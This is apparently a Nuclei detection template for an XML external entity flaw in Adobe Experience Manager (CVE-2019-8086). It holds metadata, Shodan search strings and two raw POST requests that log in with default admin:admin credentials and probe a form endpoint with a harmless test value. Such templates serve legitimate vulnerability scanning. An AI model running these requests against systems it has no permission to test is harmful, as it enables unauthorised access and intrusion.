id: CVE-2019-8086
info:
name: Adobe Experience Manager - XML External Entity Injection
author: DhiyaneshDk
severity: high
description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution.
remediation: |
Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
reference:
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086
- https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8086
cwe-id: CWE-611
epss-score: 0.09189
epss-percentile: 0.94079
cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: experience_manager
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
tags: cve,cve2019,aem,adobe
http:
- raw:
- |
POST /content/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
sling:resourceType=fd/af/components/guideContainer
- |
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"\u0041\u0042\u0043"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ABC'
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a004730450221008368d1b81b50d3388ed41acdc91d4123c1608c248690ebf4ec827658549a54ce02207660bcd96e45fd2faa18f16d9bec21ac55a498b69fe26122eb359bb5e46d992e:922c64590222798bb761d5b6d8e72950